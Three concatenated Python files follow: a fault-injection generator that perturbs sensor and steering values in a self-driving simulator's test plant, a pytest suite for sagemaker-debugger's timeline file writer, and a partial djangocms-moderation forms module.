    deltaRange = np.arange(10,61,10)
    for trig in np.arange(0,len(trigger_code)):
        for d in deltaRange:
            for dt in [30.]:
                t2 = dt
                delta = random.randint(d,d+9)
                if delta > 60:
                    delta = 60
                delta = delta*0.44704 # 1MPH = 0.44704 m/s
                t1 = random.randint(2,29)
                code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'>=85.0:'+'// '+variable[0]+'= 85.0'))
                param.append(','.join(['current speed',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### md-rand-incProcPlant-H3
def gen_md_rand_val_plant(lane,sceneNum):
    """Generate uniform-random offset faults on the path-model lane lines.

    *lane* selects 'left', 'right', or (any other value) both lane-line
    variables in maneuver.py.
    """
    title = str(sceneNum)+'_'+lane+'Lane-rand-incProcPlant-H3'
    faultLibFile = 'fault_library/mdPlant_'+lane
    fileLoc = 'selfdrive/test/plant/maneuver.py'
    faultLoc = '#md:HOOK#'
    trigger = ['self.frameIdx']
    # Unused here: gen_uniform_rand_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time<=2.0 and RSpeed>=0:', 'if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:','if headway_time>2.0 and RSpeed>0:']
    code = []
    param = []
    if lane.lower()=='left':
        variable = ['self.lLane']
    elif lane.lower()=='right':
        variable = ['self.rLane']
    else:
        variable = ['self.lLane','self.rLane']
    deltaRange = np.arange(-2.5,2.5,0.5)
    for trig in np.arange(0,len(trigger_code)):
        for dt in [30.0]:
            t2 = dt
            for d1 in deltaRange:
                # Each fault draws from a 1-unit-wide interval [d1, d1+1).
                d2 = d1+1
                t1 = random.randint(2,29)
                code.append(gen_uniform_rand_code('', trigger, t1*100., t2*100., variable, d1, d2, ''))
                param.append(','.join(['path model',str(t1),str(dt),str(d1),str(d2)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### angSteer-add-incProcPlant-H3
def gen_angle_steer_add_plant(sceneNum):
    """Generate add-offset faults on the steering angle (angle_steer2send),
    with the offset converted from degrees to radians."""
    title = str(sceneNum)+'_angSteer-add-incProcPlant-H3'
    faultLibFile = 'fault_library/angSteerPlant'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#angle_steer:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_add_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time>2.0 and RSpeed>=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:','if headway_time>2.0 and RSpeed>0:']
    code = []
    param = []
    variable = ['angle_steer2send']
    deltaRange = np.arange(-45,46,10)
    for trig in np.arange(0,len(trigger_code)):
        for dt in [30.0]:
            t2 = dt
            for d in deltaRange:
                delta = random.randint(d,d+9)
                # NOTE(review): this tests d, not delta — with d == 45, delta
                # can reach 54 and still take the else branch, producing an
                # angle above the apparent 45-degree cap; confirm intended.
                if d > 45:
                    alpha = 45*3.1416/180.0
                else:
                    alpha = delta*3.1416/180.0
                t1 = random.randint(2,29)
                code.append(gen_add_code('', trigger, t1*100., t2*100., variable, ['('+str(alpha)+')'], ''))
                param.append(','.join(['steer angle',str(t1),str(dt),str(alpha)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### vision-none-miscommVisPlant-H3
def gen_vision_miscomm_fault_plant(sceneNum):
    """Generate vision-miscommunication faults: the '//none' injection drops
    the model-data output while frameIdx is inside the generated window."""
    title = str(sceneNum)+'_vision-none-miscommVisPlant-H3'
    faultLibFile = 'fault_library/visMiscommPlant'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#md_none:HOOK#'
    trigger = ['frameIdx']
    # Unused here (gen_none_code gets an empty trigger_code).
    # NOTE(review): entries 2-4 are missing the trailing ':' — harmless while
    # unused, but would be invalid if ever passed as trigger_code.
    trigger_code = ['if headway_time>2.0 or RSpeed<0:','if headway_time>2.0 or RSpeed>0', 'if headway_time<=2.0 or RSpeed<=0', 'if headway_time<=2.0 or RSpeed>0']
    code = []
    param = []
    variable = []
    for trig in np.arange(0,len(trigger_code)):
        for dt in [0.0]:
            t2 = dt
            t1 = random.randint(2,29)
            # Window is frames [0, t1*100], as in the radar-jamming generators.
            code.append(gen_none_code('', trigger, t2*100., t1*100., ''))
            param.append(','.join(['vision miscomm',str(t1),str(dt),'none']))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### vision-effect-noisyInputManeuver-H3
def gen_vision_noisyInput_fault_Maneuver(effect, sceneNum):
    """Generate noisy-input vision faults: stuck-at injections pin
    self.effect/self.thickness in maneuver.py to the given *effect* id and
    each thickness in an effect-specific range."""
    title = str(sceneNum)+'_vision-effect-noisyInputManeuver-H3'
    faultLibFile = ''
    fileLoc = 'selfdrive/test/plant/maneuver.py'
    faultLoc = '#visionFault:HOOK#'
    trigger = ['self.frameIdx']
    # Unused here: gen_stuck_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time<=2.5 and RSpeed>=0:', 'if headway_time>2.5 and RSpeed>0:','if headway_time>2.5 and RSpeed<=0:','if headway_time<=2.5 and RSpeed<0:']
    code = []
    param = []
    #variable = ['left_line','right_line']
    #deltaRange = ['lanes[0]','lanes[1]']
    variable = ['self.effect', 'self.thickness']
    # Thickness ranges depend on the effect id.
    # NOTE(review): an effect id > 9 leaves range_th undefined and raises
    # NameError below — callers only pass 1-9 in this file.
    if effect <7:
        range_th = range(1,11)
    elif effect == 7:
        range_th = range(3,7)
    elif effect == 8:
        range_th = [3,5,7]
    elif effect == 9:
        range_th = [3,5]
    for trig in np.arange(0,len(trigger_code)):
        for dt in [30.0]:
            for th in range_th:
                t2 = dt
                t1 = random.randint(2,29)
                code.append(gen_stuck_code('', trigger, t1*100., t2*100., variable, [str(effect), str(th)], ''))
                param.append(','.join(['vision noisyInput',str(t1),str(dt),'none']))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-add-incVision-H1
def gen_vision_dRel_add_fault_plant(sceneNum):
    """Generate add-offset faults on the vision relative distance
    (vision_dRel)."""
    title = str(sceneNum)+'_d_rel-add-incVision-H1'
    faultLibFile = 'fault_library/dRelPlantVis'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#vision_dRel:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_add_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:','if headway_time>2.0 and RSpeed<=0:']
    code = []
    param = []
    variable = ['vision_dRel']
    deltaRange = np.arange(15,255,10)
    for trig in np.arange(0,len(trigger_code)):
        for dt in [30.0]:
            t2 = dt
            for d in deltaRange:
                delta = random.randint(d,d+9)
                t1 = random.randint(2,29)
                #code.append(gen_add_code(trigger_code, trigger, t1, t2, variable, [delta], '//if '+variable[0]+'>=255:'+'// '+variable[0]+'= 254'))
                code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
                param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-sub-incVision-H2
def gen_vision_dRel_sub_fault_plant(sceneNum):
    """Generate subtract-offset faults on the vision relative distance
    (vision_dRel), clamped at 0 by the injected guard code."""
    title = str(sceneNum)+'_d_rel-sub-incVision-H2'
    faultLibFile = 'fault_library/dRelPlantVis'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#vision_dRel:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_sub_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
    code = []
    param = []
    variable = ['vision_dRel']
    deltaRange = np.arange(10,255,10)
    for trig in np.arange(0,len(trigger_code)):
        for d in deltaRange:
            for dt in [30.0]:
                t2 = dt
                delta = random.randint(d,d+9)
                t1 = random.randint(2,29)
                code.append(gen_sub_code('',trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'<0:'+'// '+variable[0]+'= 0'))
                param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-add-incRadVis-H1
def gen_RadVis_dRel_add_fault_plant(sceneNum):
    """Generate add-offset faults on the fused radar+vision relative distance
    (d_rel)."""
    title = str(sceneNum)+'_d_rel-add-incRadVis-H1'
    faultLibFile = 'fault_library/dRelPlantRadVis'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#RadVis_dRel:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_add_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed<=0:']
    code = []
    param = []
    variable = ['d_rel']
    deltaRange = np.arange(15,255,10)
    for trig in np.arange(0,len(trigger_code)):
        for dt in [30.0]:
            t2 = dt
            for d in deltaRange:
                delta = random.randint(d,d+9)
                t1 = random.randint(2,29)
                #code.append(gen_add_code(trigger_code, trigger, t1, t2, variable, [delta], '//if '+variable[0]+'>=255:'+'// '+variable[0]+'= 254'))
                code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
                param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-sub-incRadVis-H2
def gen_RadVis_dRel_sub_fault_plant(sceneNum):
    """Generate subtract-offset faults on the fused radar+vision relative
    distance (d_rel), clamped at 0 by the injected guard code."""
    title = str(sceneNum)+'_d_rel-sub-incRadVis-H2'
    faultLibFile = 'fault_library/dRelPlantRadVis'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#RadVis_dRel:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_sub_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
    code = []
    param = []
    variable = ['d_rel']
    deltaRange = np.arange(10,255,10)
    for trig in np.arange(0,len(trigger_code)):
        for d in deltaRange:
            for dt in [30.0]:
                t2 = dt
                delta = random.randint(d,d+9)
                t1 = random.randint(2,29)
                code.append(gen_sub_code('',trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'<0:'+'// '+variable[0]+'= 0'))
                param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
##########################################
###_main_###
# Main: reset the campaign runner script, then generate every selected
# fault-library scenario. Fixes the Python 2 `print sceneNum` statement by
# using the print() call form, which is valid under both Python 2 and 3.
with open('run_fault_inject_campaign.sh', 'w') as runFile:
    runFile.write('#Usage: python run.py target_fault_library\n')
# Maps scenario number -> generator function for that fault type.
scenarios = {
    1 : gen_rel_dist_add_fault_plant,
    2 : gen_rel_vel_add_fault_plant,
    3 : gen_rel_dist_sub_fault_plant,
    4 : gen_rel_vel_sub_fault_plant,
    5 : gen_radar_jamming_fault_plant_H1,
    6 : gen_radar_jamming_fault_plant_H2,
    9 : gen_curr_sp_sub_fault_plant,
    12 : gen_curr_sp_add_fault_plant,
    13 : gen_md_rand_val_plant,
    14 : gen_md_rand_val_plant,
    15 : gen_md_rand_val_plant,
    16 : gen_angle_steer_add_plant,
    34 : gen_vision_miscomm_fault_plant,
    35 : gen_vision_noisyInput_fault_Maneuver,
    36 : gen_vision_noisyInput_fault_Maneuver,
    37 : gen_vision_noisyInput_fault_Maneuver,
    38 : gen_vision_noisyInput_fault_Maneuver,
    39 : gen_vision_dRel_add_fault_plant,
    40 : gen_vision_dRel_sub_fault_plant,
    41 : gen_RadVis_dRel_add_fault_plant,
    42 : gen_RadVis_dRel_sub_fault_plant,
    43 : gen_vision_noisyInput_fault_Maneuver,
    44 : gen_vision_noisyInput_fault_Maneuver,
    45 : gen_vision_noisyInput_fault_Maneuver,
    46 : gen_vision_noisyInput_fault_Maneuver,
    47 : gen_vision_noisyInput_fault_Maneuver
}
lanes = ['left','right','both'] # 'left','right','both'
poly = ['p_path','left','right','d_path'] # 'p_path','left','right','d_path'
#effects = ['rain', 'fog', 'snow', 'occlusion']
effects = [1,2,3,4,5,6,7,8,9]
for sceneNum in [1,2,3,4,5,6,9,12,13,14,15,16,34,39,40,41,42]: # experiments without the vision
#for sceneNum in [35,36,37,38,43,44,45,46,47]: # for testing the faults in input images
#for sceneNum in [1,2,3,4,5,6,9,12,13,14,15,16,34,35,36,37,38,39,40,41,42,43,44,45,46,47]: # for testing the faults in inputs
# for sceneNum in [44,45,46,47]:
    print(sceneNum)
    # Keep a backup of the previous fault library before regenerating it.
    cmd = 'cp '+ 'fault_library/scenario_'+str(sceneNum)+'.txt '+'fault_library/scenario_'+str(sceneNum)+'_prev.txt'
    os.system(cmd)
    # Scenario ranges that take an extra positional argument (lane, poly
    # component, or vision-effect id) before the scene number.
    if sceneNum >= 13 and sceneNum <=15:
        scenarios[sceneNum](lanes[sceneNum-13],sceneNum)
    elif sceneNum >= 28 and sceneNum <=31:
        scenarios[sceneNum](poly[sceneNum-28],sceneNum)
    elif sceneNum >= 35 and sceneNum <=38:
        scenarios[sceneNum](effects[sceneNum-35],sceneNum)
    elif sceneNum >= 43 and sceneNum <=47:
        # Scenes 43-47 map onto effects[4..8] (ids 5-9).
        scenarios[sceneNum](effects[sceneNum+4-43],sceneNum)
    else:
        scenarios[sceneNum](sceneNum)
|
<reponame>sophiayue1116/sagemaker-debugger
# Standard Library
import calendar
import json
import multiprocessing as mp
import os
import time
from datetime import datetime
from pathlib import Path
# Third Party
import pytest
# First Party
from smdebug.core.tfevent.timeline_file_writer import TimelineFileWriter
from smdebug.profiler.profiler_config_parser import ProfilerConfigParser
from smdebug.profiler.profiler_constants import (
CONVERT_TO_MICROSECS,
DEFAULT_PREFIX,
TRACE_DIRECTORY_FORMAT,
)
@pytest.fixture()
def complete_profiler_config_parser(config_folder, monkeypatch):
    # Parser loaded from the "complete" config fixture file; the env var tells
    # ProfilerConfigParser where to find its JSON config.
    config_path = os.path.join(config_folder, "complete_profiler_config_parser.json")
    monkeypatch.setenv("SMPROFILER_CONFIG_PATH", config_path)
    return ProfilerConfigParser()
@pytest.fixture()
def file_open_fail_profiler_config_parser(config_folder, monkeypatch):
    # Parser loaded from the config fixture that simulates a file-open failure.
    config_path = os.path.join(config_folder, "file_open_fail_profiler_config_parser.json")
    monkeypatch.setenv("SMPROFILER_CONFIG_PATH", config_path)
    return ProfilerConfigParser()
@pytest.fixture()
def rotation_profiler_config_parser(config_folder, monkeypatch):
    # Factory fixture: the test supplies a rotation policy name (e.g.
    # "file_size" or "file_interval") and receives a parser configured from
    # the matching fixture file.
    def _choose_config(rotation_policy=None):
        nonlocal config_folder
        nonlocal monkeypatch
        config_path = os.path.join(
            config_folder, rotation_policy + "_rotation_profiler_config_parser.json"
        )
        monkeypatch.setenv("SMPROFILER_CONFIG_PATH", config_path)
        return ProfilerConfigParser()
    return _choose_config
def test_create_timeline_file(simple_profiler_config_parser, out_dir):
    """
    This test is meant to test successful creation of the timeline file according to file path specification.
    $ENV_BASE_FOLDER/framework/pevents/$START_TIME_YYMMDDHR/$FILEEVENTSTARTTIMEUTCINEPOCH_
    {$ENV_NODE_ID_4digits0padded}_pythontimeline.json
    It reads backs the file contents to make sure it is in valid JSON format.
    """
    assert simple_profiler_config_parser.profiling_enabled
    timeline_writer = TimelineFileWriter(profiler_config_parser=simple_profiler_config_parser)
    assert timeline_writer
    for i in range(1, 11):
        n = "event" + str(i)
        timeline_writer.write_trace_events(
            training_phase="FileCreationTest", op_name=n, step_num=i, timestamp=time.time()
        )
    timeline_writer.flush()
    timeline_writer.close()
    files = []
    for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
        files.append(path)
    # A single-process writer must have produced exactly one trace file.
    assert len(files) == 1
    # File name begins with the event start timestamp; the parent folder is
    # that timestamp (seconds granularity) in TRACE_DIRECTORY_FORMAT.
    file_ts = files[0].name.split("_")[0]
    folder_name = files[0].parent.name
    assert folder_name == time.strftime(
        TRACE_DIRECTORY_FORMAT, time.gmtime(int(file_ts) / CONVERT_TO_MICROSECS)
    )
    # Round-trip check: the folder name parses back under the same format.
    assert folder_name == datetime.strptime(folder_name, TRACE_DIRECTORY_FORMAT).strftime(
        TRACE_DIRECTORY_FORMAT
    )
    with open(files[0]) as timeline_file:
        events_dict = json.load(timeline_file)
    assert events_dict
def run(rank, profiler_config_parser):
    """Worker body for the multiprocess test: emit five trace events tagged
    with this process's pid and *rank*, then flush and close the writer."""
    writer = TimelineFileWriter(profiler_config_parser=profiler_config_parser)
    assert writer
    for idx in range(1, 6):
        writer.write_trace_events(
            training_phase="MultiProcessTest",
            op_name="event" + str(idx),
            step_num=0,
            worker=os.getpid(),
            process_rank=rank,
            timestamp=time.time(),
        )
    writer.flush()
    writer.close()
def test_multiprocess_write(simple_profiler_config_parser, out_dir):
    """
    This test is meant to test timeline events written multiple processes. Each process or worker, will have its own trace file.
    """
    assert simple_profiler_config_parser.profiling_enabled
    # Spawn one writer process per CPU; each runs run() and writes 5 events.
    cpu_count = mp.cpu_count()
    processes = []
    for rank in range(cpu_count):
        p = mp.Process(target=run, args=(rank, simple_profiler_config_parser))
        # We first train the model across `num_processes` processes
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
    # One trace file per process is expected.
    files = []
    for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
        files.append(path)
    assert len(files) == cpu_count
    # Count the "event*" records across all files: 5 per process.
    event_ctr = 0
    for file_name in files:
        with open(file_name) as timeline_file:
            events_dict = json.load(timeline_file)
        for e in events_dict:
            if e["name"].startswith("event"):
                event_ctr += 1
    assert event_ctr == cpu_count * 5
def test_duration_events(simple_profiler_config_parser, out_dir):
    """
    This test is meant to test duration events. By default, write_trace_events records complete events.
    TODO: Make TimelineWriter automatically calculate duration while recording "E" event
    """
    assert simple_profiler_config_parser.profiling_enabled
    # Fix: the original had a duplicated `timeline_writer = timeline_writer = ...`
    # assignment; a single binding is sufficient.
    timeline_writer = TimelineFileWriter(
        profiler_config_parser=simple_profiler_config_parser
    )
    assert timeline_writer
    # Emit a matching begin ("B") / end ("E") pair for each of ten ops.
    for i in range(1, 11):
        n = "event" + str(i)
        timeline_writer.write_trace_events(
            training_phase="DurationEventTest",
            op_name=n,
            step_num=i,
            phase="B",
            timestamp=time.time(),
        )
        timeline_writer.write_trace_events(
            training_phase="DurationEventTest",
            op_name=n,
            step_num=i,
            phase="E",
            timestamp=time.time(),
        )
    timeline_writer.flush()
    timeline_writer.close()
    # Exactly one trace file should be produced, containing valid non-empty JSON.
    files = []
    for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
        files.append(path)
    assert len(files) == 1
    with open(files[0]) as timeline_file:
        events_dict = json.load(timeline_file)
    assert events_dict
@pytest.mark.slow
@pytest.mark.parametrize("policy", ["file_size", "file_interval"])
def test_rotation_policy(rotation_profiler_config_parser, policy, out_dir):
    """
    This test is meant to test if files are being closed and open correctly according to the 2 rotation policies -
    file_size -> close file if it exceeds certain size and open a new file
    file_interval -> close file if the file's folder was created before a certain time period and open a new file in a new folder
    :param policy: file_size or file_interval
    """
    rotation_profiler_config = rotation_profiler_config_parser(policy)
    assert rotation_profiler_config.profiling_enabled
    timeline_writer = TimelineFileWriter(profiler_config_parser=rotation_profiler_config)
    assert timeline_writer
    for i in range(1, 100):
        n = "event" + str(i)
        # adding a sleep here to trigger rotation policy
        time.sleep(0.05)
        timeline_writer.write_trace_events(
            training_phase=f"RotationPolicyTest_{policy}",
            op_name=n,
            step_num=i,
            timestamp=time.time(),
        )
    timeline_writer.flush()
    timeline_writer.close()
    files = []
    for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
        files.append(path)
    # check if files have been generated
    assert files
    # count the number of event JSON strings. This is to ensure all events have been written.
    # also check if the timestamp of all events in a file are <= filename timestamp
    event_ctr = 0
    start_time_since_epoch = 0
    file_details = []
    for file_name in files:
        if policy == "file_size":
            file_details.append(os.path.getsize(file_name))
        else:
            file_details.append(os.path.getmtime(file_name))
        path = file_name.name.split(DEFAULT_PREFIX)
        file_timestamp = int(path[0].split("_")[0])
        num_events_in_file = 0
        with open(file_name) as timeline_file:
            events_dict = json.load(timeline_file)
            for e in events_dict:
                if "args" in e and "start_time_since_epoch_in_micros" in e["args"]:
                    start_time_since_epoch = int(e["args"]["start_time_since_epoch_in_micros"])
                if "event" in e["name"]:
                    num_events_in_file += 1
                    event_ctr += 1
                    # NOTE(review): left side is seconds while file_timestamp is
                    # microseconds — the comparison is very loose; kept as-is.
                    assert (
                        int(round(e["ts"] + start_time_since_epoch) / CONVERT_TO_MICROSECS)
                        <= file_timestamp
                    )
        # if rotation occurs too often, there might be only 1 event per file
        # the below assertion checks for this
        assert num_events_in_file >= 2
    if policy == "file_size":
        # assuming rotation max file size is 800 bytes, check if all the files are in the
        # range +- 60 bytes.
        # Fix: the original `assert [comprehension]` was always truthy (non-empty
        # list), and `pytest.approx(800, 60)` set a *relative* tolerance; use
        # all() with an absolute tolerance of 60 bytes.
        assert all(x == pytest.approx(800, abs=60) for x in file_details)
    else:
        # assuming rotation file close interval is 0.5 seconds, check if the close time
        # difference between consecutive files is at least 0.5 seconds.
        # Fix: `sorted(file_details)` discarded its result; sort in place.
        file_details.sort()
        res = [j - i for i, j in zip(file_details[:-1], file_details[1:])]
        # Fix: `assert [comprehension]` was always truthy; use all().
        assert all(x >= 0.5 for x in res)
    assert event_ctr == 99
@pytest.mark.parametrize("timezone", ["Europe/Dublin", "Australia/Melbourne", "US/Eastern"])
def test_utc_timestamp(monkeypatch, simple_profiler_config_parser, timezone, out_dir):
    """
    This test is meant to set to create files/events in different timezones and check if timeline writer stores
    them in UTC.
    """
    # Force the process timezone, then make time.* honor it via tzset().
    monkeypatch.setenv("TZ", timezone)
    assert simple_profiler_config_parser.profiling_enabled
    time.tzset()
    timeline_writer = TimelineFileWriter(profiler_config_parser=simple_profiler_config_parser)
    assert timeline_writer
    event_times_in_utc = []
    for i in range(1, 3):
        # Local-timezone timestamp is handed to the writer; the UTC equivalent
        # is recorded separately for later comparison.
        event_time_in_timezone = time.mktime(time.localtime())
        event_time_in_utc = time_in_utc = calendar.timegm(time.gmtime())
        event_times_in_utc.append(event_time_in_utc)
        timeline_writer.write_trace_events(
            training_phase=f"TimestampTest",
            op_name="event_in_" + timezone + str(i),
            timestamp=event_time_in_timezone,
            duration=20,
        )
    timeline_writer.flush()
    timeline_writer.close()
    files = []
    for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
        files.append(path)
    file_path = files[0]
    path = file_path.name.split(DEFAULT_PREFIX)
    file_timestamp = int(path[0].split("_")[0])
    # file timestamp uses end of last event
    # (relies on `time_in_utc` keeping its value from the final loop iteration)
    assert (time_in_utc + 20) * CONVERT_TO_MICROSECS == file_timestamp
    start_time_since_epoch = 0
    idx = 0
    for file_name in files:
        with open(file_name) as timeline_file:
            events_dict = json.load(timeline_file)
        for e in events_dict:
            if "args" in e and "start_time_since_epoch_in_micros" in e["args"]:
                start_time_since_epoch = int(e["args"]["start_time_since_epoch_in_micros"])
            if "event" in e["name"]:
                # Event "ts" is an offset from start_time_since_epoch; the sum
                # must equal the UTC time captured when the event was written.
                assert (
                    e["ts"] + start_time_since_epoch
                    == event_times_in_utc[idx] * CONVERT_TO_MICROSECS
                )
                idx += 1
def test_file_open_fail(file_open_fail_profiler_config_parser):
    """A writer pointed at an invalid path must not raise; instead its
    background worker flags itself unhealthy."""
    assert file_open_fail_profiler_config_parser.profiling_enabled
    # writing to an invalid path to trigger file open failure
    writer = TimelineFileWriter(
        profiler_config_parser=file_open_fail_profiler_config_parser
    )
    assert writer
    for event_idx in range(1, 5):
        # Adding a sleep here to slow down event queuing
        time.sleep(0.001)
        writer.write_trace_events(
            training_phase=f"FileOpenTest",
            op_name="event" + str(event_idx),
            step_num=event_idx,
            timestamp=time.time(),
        )
    writer.flush()
    writer.close()
    # hacky way to check if the test passes: inspect the worker's health flag
    assert not writer._worker._healthy
def test_events_far_apart(complete_profiler_config_parser, out_dir):
    """Two events whose timestamps are far apart must land in separate files
    under the file_interval rotation policy."""
    assert complete_profiler_config_parser.profiling_enabled
    timeline_writer = TimelineFileWriter(profiler_config_parser=complete_profiler_config_parser)
    assert timeline_writer
    event_time_now = time.time()
    # Fix: the original variable was named `event_time_after_2hours` but the
    # offset is 120 *seconds*; renamed to match the actual value.
    event_time_later = event_time_now + 120
    timeline_writer.write_trace_events(
        training_phase=f"FileOpenTest", op_name="event1", timestamp=event_time_now
    )
    time.sleep(2)
    timeline_writer.write_trace_events(
        training_phase=f"FileOpenTest", op_name="event2", timestamp=event_time_later
    )
    timeline_writer.flush()
    timeline_writer.close()
    files = []
    for path in Path(out_dir + "/" + DEFAULT_PREFIX).rglob("*.json"):
        files.append(path)
    # rotate by file_size, gives 4 files - 1 per event
    # rotate by file_interval, gives 2 files
    assert len(files) == 2
|
<reponame>adam-murray/djangocms-moderation<gh_stars>1-10
from __future__ import unicode_literals
from django import forms
from django.contrib import admin
from django.contrib.admin.widgets import RelatedFieldWidgetWrapper
from django.contrib.auth import get_user_model
from django.forms.forms import NON_FIELD_ERRORS
from django.utils.translation import ugettext, ugettext_lazy as _, ungettext
from adminsortable2.admin import CustomInlineFormSet
from djangocms_versioning.models import Version
from .constants import ACTION_CANCELLED, ACTION_REJECTED, ACTION_RESUBMITTED, COLLECTING
from .helpers import (
get_active_moderation_request,
is_obj_version_unlocked,
is_registered_for_moderation,
)
from .models import (
CollectionComment,
ModerationCollection,
ModerationRequest,
ModerationRequestAction,
RequestComment,
)
class WorkflowStepInlineFormSet(CustomInlineFormSet):
    """Inline formset for workflow steps enforcing one step per role.

    Re-checks the ("role", "workflow") uniqueness by hand because Django
    skips unique validation for inlines whose parent is not yet saved.
    """

    def validate_unique(self):
        super().validate_unique()
        # The following fixes a bug in Django where it doesn't validate unique constraint
        # when the parent model in inline relationship has not been saved
        # NOTE(review): `errors` is accumulated below but never surfaced —
        # appears to be unused.
        errors = []
        unique_check = ("role", "workflow")
        selected_roles = []
        forms_to_delete = self.deleted_forms
        # Only valid, non-deleted forms take part in the uniqueness check.
        valid_forms = [
            form
            for form in self.forms
            if form.is_valid() and form not in forms_to_delete
        ]
        for form in valid_forms:
            selected_role = form.cleaned_data.get("role")
            if not selected_role:
                continue
            if selected_role.pk in selected_roles:
                # poke error messages into the right places and mark
                # the form as invalid
                errors.append(self.get_unique_error_message(unique_check))
                form._errors[NON_FIELD_ERRORS] = self.error_class(
                    [self.get_form_error()]
                )
                # remove the data from the cleaned_data dict since it was invalid
                for field in unique_check:
                    if field in form.cleaned_data:
                        del form.cleaned_data[field]
            else:
                selected_roles.append(selected_role.pk)
class UpdateModerationRequestForm(forms.Form):
    """Form used to act on an active moderation request (approve, reject,
    cancel, resubmit), optionally routing it to a specific next moderator."""

    moderator = forms.ModelChoiceField(
        label=_("moderator"), queryset=get_user_model().objects.none(), required=False
    )
    message = forms.CharField(
        label=_("comment"), required=False, widget=forms.Textarea()
    )

    def __init__(self, *args, **kwargs):
        # Context is injected by the caller rather than taken from form data.
        self.action = kwargs.pop("action")
        self.language = kwargs.pop("language")
        self.page = kwargs.pop("page")
        self.user = kwargs.pop("user")
        self.workflow = kwargs.pop("workflow")
        self.active_request = kwargs.pop("active_request")
        super().__init__(*args, **kwargs)
        self.configure_moderator_field()

    def configure_moderator_field(self):
        """Restrict the moderator choices to users of the next workflow step,
        or hide the field entirely when the action makes it irrelevant."""
        # For cancelling and rejecting, we don't need to display a moderator
        # field.
        if self.action in (ACTION_CANCELLED, ACTION_REJECTED):
            self.fields["moderator"].queryset = get_user_model().objects.none()
            self.fields["moderator"].widget = forms.HiddenInput()
            return
        # If the content author is resubmitting the work after a rejected
        # moderation request, the next step will be the first one - as it has
        # to be approved again from the beginning
        if self.action == ACTION_RESUBMITTED:
            next_step = self.active_request.workflow.first_step
        else:
            current_step = self.active_request.user_get_step(self.user)
            next_step = current_step.get_next() if current_step else None
        if next_step:
            next_role = next_step.role
            users = next_step.role.get_users_queryset()
            self.fields["moderator"].empty_label = ugettext("Any {role}").format(
                role=next_role.name
            )
            # The acting user cannot pick themselves as the next moderator.
            self.fields["moderator"].queryset = users.exclude(pk=self.user.pk)
        else:
            self.fields["moderator"].queryset = get_user_model().objects.none()
            self.fields["moderator"].widget = forms.HiddenInput()

    def save(self):
        """Apply the chosen action to the active moderation request."""
        self.active_request.update_status(
            action=self.action,
            by_user=self.user,
            to_user=self.cleaned_data.get("moderator"),
            message=self.cleaned_data["message"],
        )
class CollectionItemsForm(forms.Form):
    """Form for adding versions to one of the user's collecting-state
    moderation collections.

    Only versions that are registered for moderation, not already in an
    active moderation request, and not version-locked by another user are
    accepted; everything else is silently filtered out (a ValidationError is
    raised only when *no* eligible version remains).
    """

    collection = forms.ModelChoiceField(
        queryset=None, required=True  # Populated in __init__
    )
    versions = forms.ModelMultipleChoiceField(
        queryset=Version.objects.all(),
        required=True,
        widget=forms.MultipleHiddenInput(),
    )

    def __init__(self, user, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.user = user
        # A user may only add items to their own, still-collecting collections.
